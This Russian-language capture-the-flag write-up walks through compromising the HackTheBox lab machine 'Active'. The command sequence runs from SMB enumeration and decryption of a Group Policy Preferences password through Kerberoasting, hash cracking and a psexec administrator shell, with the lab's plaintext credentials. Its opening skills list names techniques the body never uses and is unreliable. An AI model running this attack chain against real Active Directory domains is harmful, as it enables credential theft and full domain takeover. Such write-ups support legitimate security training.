> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/windows-easy/active-hackthebox-writeup.md).

# Разбор Active на HackTheBox

{% embed url="<https://app.hackthebox.com/machines/148>" %}

{% hint style="warning" %}
**Навыки**:

* Перечисление SMB
* Взлом ZIP-файла, защищённого паролем (fcrackzip)
* Взлом и чтение файла .PFX (crackpkcs12)
* Получение SSL-доступа с помощью Evil-WinRM
* Утечка информации — чтение истории Powershell пользователя (поворот через пользователя)
* Использование LAPS для получения паролей (Get-LAPSPasswords.ps1) (повышение привилегий)
  {% endhint %}

## Разведка

**Настройка рабочей среды:**

Настройте рабочую среду, создав три папки для хранения важного содержимого, эксплойтов и результатов разведки Nmap.

<figure><img src="/files/0d77b90d792f0441f7499638f28de72691abaeff" alt=""><figcaption></figcaption></figure>

**Проверка подключения VPN**

Проверьте подключение к VPN, чтобы обеспечить стабильную связь с целевой машиной.

<figure><img src="/files/e711f0d83daa96fc668997586063671b9c1c34ec" alt=""><figcaption></figcaption></figure>

**Обнаружение открытых портов с помощью Nmap:**/ Перечислите открытые порты и экспортируйте результаты в файл "allPorts" в каталоге Nmap:

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.100 -oG allPorts
```

<figure><img src="/files/4a7d19ba237f3e1b81e495d97b6e859821dbde02" alt=""><figcaption></figcaption></figure>

**Анализ открытых портов с помощью extractport:**/ Использование функции extractport для краткого отображения открытых портов и копирования их в буфер обмена.

<div data-full-width="true"><figure><img src="/files/9dccc003a97ab83cea4ff17c25f306f78705526f" alt=""><figcaption></figcaption></figure></div>

**Сканирование версий портов с помощью Nmap:**/ Используйте Nmap для сканирования версий служб и сохранения вывода в файл "targeted":

```bash
nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49168,49173 10.10.10.100 -oN targeted
```

<figure><img src="/files/bd161a6ce9338cf313b74c6ffc47a3467f8077f2" alt=""><figcaption></figcaption></figure>

## **Перечисление и эксплуатация:**

### **SMB-перечисление:**

Используйте crackmapexec, чтобы перечислить системы и найти имя домена.

```bash
crackmapexec smb 10.10.10.100
```

<figure><img src="/files/10159508a4090ae4f8bb2911883a906f0bbfc2e8" alt=""><figcaption></figcaption></figure>

#### **Корректировка времени с помощью NTP:**

Настройте время на целевой машине, чтобы избежать проблем

```bash
ntpdate 10.10.10.100
```

<figure><img src="/files/2688fe196b1498c475053dae7f7d96097c97481e" alt=""><figcaption></figcaption></figure>

#### Настройка /etc/hosts:

Контроллер домена добавлен в файл hosts, чтобы позволить ping:

<figure><img src="/files/81c96700588f3e83cae663f64ce2de3484684749" alt=""><figcaption></figcaption></figure>

### **Перечисление общих ресурсов**

Используйте smbclient или smbmap для изучения общих ресурсов в сети.

```bash
smbclient -L 10.10.10.100 -N
```

<figure><img src="/files/3b0825662fe9153dcb767da21118ab518990d168" alt=""><figcaption></figcaption></figure>

```bash
smbmap -H 10.10.10.100
```

<figure><img src="/files/2f110b7e612da2686a99a37d8717e202d923c219" alt=""><figcaption></figcaption></figure>

### **Поиск конкретных файлов**:

Изучайте каталоги в поисках нужных файлов

```bash
smbmap -H 10.10.10.100 -r Replication
```

<figure><img src="/files/6d61fb139a44e693ffca8c5da076d4bfc3f5244a" alt=""><figcaption></figcaption></figure>

```bash
smbmap -H 10.10.10.100 -r Replication/active.htb
```

<figure><img src="/files/b472bd8e7f9cd7c3e4786a342bbc5560352e282b" alt=""><figcaption></figcaption></figure>

У `groups.xml` обнаружен файл, который может содержать конфиденциальную информацию.

```bash
smbmap -H 10.10.10.100 --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
```

<div data-full-width="true"><figure><img src="/files/e73d79b7fc0b1963ea1006196ded59d2e6a892c2" alt=""><figcaption></figcaption></figure></div>

<div data-full-width="true"><figure><img src="/files/28540b2f9be8cc6ac35b305bf1c1c0579476ea25" alt=""><figcaption></figcaption></figure></div>

### **Расшифровка пароля:**

Используйте `gpp-decrypt` для расшифровки сохранённых паролей.

```bash
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
```

<figure><img src="/files/d4818e4a1fb9f17a3bf2454d850cff4badb4808c" alt=""><figcaption></figcaption></figure>

### **Проверка идентификатора:**

Используйте crackmapexec, чтобы проверить, действительны ли ID

```bash
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
```

<figure><img src="/files/9e9b9f3cd9c68fef994669f370a4bafa6e774005" alt=""><figcaption></figcaption></figure>

### **Изучение прав доступа:**

Используйте crackmapexec и smbmap для изучения прав доступа к сетевым общим ресурсам.

```bash
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
```

<figure><img src="/files/d5fe6958260f2c311a204b36c9a0591ef21f6479" alt=""><figcaption></figcaption></figure>

### Флаг user.txt получен:

```bash
smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users
```

<figure><img src="/files/175db3216b32b949d51c6b6700b20e1f8baa80dc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/af1e0483c4d2bb05f606f641d3a66fe35edf1a74" alt=""><figcaption></figcaption></figure>

### **Вход на контроллер домена:**

Использование rpcclient для подключения к контроллеру домена и изучения пользователей и групп:

```bash
rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.10.10.100
```

<figure><img src="/files/a5090af3d7b488f4bf12dc90411b2a4e1c7a987a" alt=""><figcaption></figcaption></figure>

#### - Чтобы определить членов группы администраторов:

```bash
rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.10.10.100 -c 'querygroupmem 0x200'
```

#### - Чтобы получить пользователей в определённой группе:

```bash
rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.10.10.100 -c 'queryuser 0x1f4'
```

<figure><img src="/files/10f6642ca22f83ff09f33ac9fa8f8c28d3e33935" alt=""><figcaption></figcaption></figure>

#### - Чтобы вывести описания всех пользователей:

```bash
rpcclient -U "SVC_TGS%GPPstillStandingStrong2k18" 10.10.10.100 -c 'querydispinfo'
```

<div data-full-width="true"><figure><img src="/files/11a7f80ed82221f6def6c16af257c3cd60a1c114" alt=""><figcaption></figcaption></figure></div>

## Уязвимость [Kerberoast](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast):

Уязвимость Kerberoast успешно эксплуатируется с помощью следующей команды:

```bash
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18
```

Эта команда восстанавливает служебный билет Grant-Ticketing Service (TGS), который использует уязвимость.

Затем, чтобы получить хеш администратора, к команде добавляется параметр -request:

```bash
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
```

<figure><img src="/files/010df5638a40e43243ff1f7e1323923ce2ec3403" alt=""><figcaption></figcaption></figure>

## **Финальная эксплуатация:**

### **Взлом хэша:**

Используйте John, чтобы попытаться взломать полученные хеши.

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

<figure><img src="/files/baed86bd122919e5e01de6b70f887fa9355fae72" alt=""><figcaption></figcaption></figure>

### **Проверка идентификатора:**

Используйте crackmapexec для проверки полученных учётных данных

```bash
crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'
```

<div data-full-width="true"><figure><img src="/files/ca78f64a63be6e000344470de368084d250aee9c" alt=""><figcaption></figcaption></figure></div>

### **Запуск Psexec:**

Используйте psexec.py, чтобы получить интерактивную оболочку от имени администратора.

```bash
psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd.exe
```

<figure><img src="/files/cf362ec6176c65297ba16d819bb694a91ee00e82" alt=""><figcaption></figcaption></figure>

### **Получен финальный флаг:**

Финальный флаг успешно получен после получения доступа администратора.

<figure><img src="/files/9751feaa73f6615ffe6caea95739fb2ebd048540" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/02ab65837c3cca1441bb7598d569f196fa1c9c4f" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/windows-easy/active-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
